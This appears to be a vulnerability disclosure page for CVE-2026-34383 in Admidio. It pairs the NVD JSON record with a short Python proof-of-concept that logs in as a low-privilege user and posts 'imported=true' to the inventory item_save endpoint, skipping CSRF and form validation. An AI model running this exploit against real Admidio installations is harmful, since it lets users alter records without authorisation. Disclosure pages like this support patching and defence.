CVE-2026-34383

import requests # Target URL configuration target_url = "http://example.com/admidio/adm_program/modules/inventory/item_save.php" login_url = "http://example.com/admidio/adm_program/system/login.php" # Attacker's credentials (low privilege) credentials = { "usr_login": "attacker", "usr_password": "password123" } session = requests.Session() # Step 1: Authenticate to get a valid session cookie # The vulnerability requires an authenticated user (PR:L) login_resp = session.post(login_url, data=credentials) if login_resp.status_code != 200: print("Login failed") exit(1) # Step 2: Exploit the vulnerability by setting 'imported' to true # This bypasses CSRF token check and server-side validation payload = { "item_name": "Malicious Item", "item_quantity": 99999, # Invalid value that would normally be rejected "imported": "true" # The key parameter to trigger the bypass } exploit_resp = session.post(target_url, data=payload) # Check if the arbitrary data was saved if exploit_resp.status_code == 200 and "success" in exploit_resp.text: print("[+] Exploit successful! Arbitrary data saved bypassing validation.") else: print("[-] Exploit failed.")

{"cve": {"id": "CVE-2026-34383", "sourceIdentifier": "[email protected]", "published": "2026-03-31T21:16:30.343", "lastModified": "2026-04-01T18:28:06.967", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Admidio is an open-source user management solution. Prior to version 5.0.8, the inventory module's item_save endpoint accepts a user-controllable POST parameter imported that, when set to true, completely bypasses both CSRF token validation and server-side form validation. An authenticated user can craft a direct POST request to save arbitrary inventory item data without CSRF protection and without the field value checks that the FormPresenter validation normally enforces. This issue has been patched in version 5.0.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.0.8", "matchCriteriaId": "943C8893-5336-477E-9026-C55A9659B1EA"}]}]}], "references": [{"url": "https://github.com/Admidio/admidio/commit/00494b95dfe847af8b938e4397e5d909d8f36839", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-4rwm-c5mj-wh7x", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}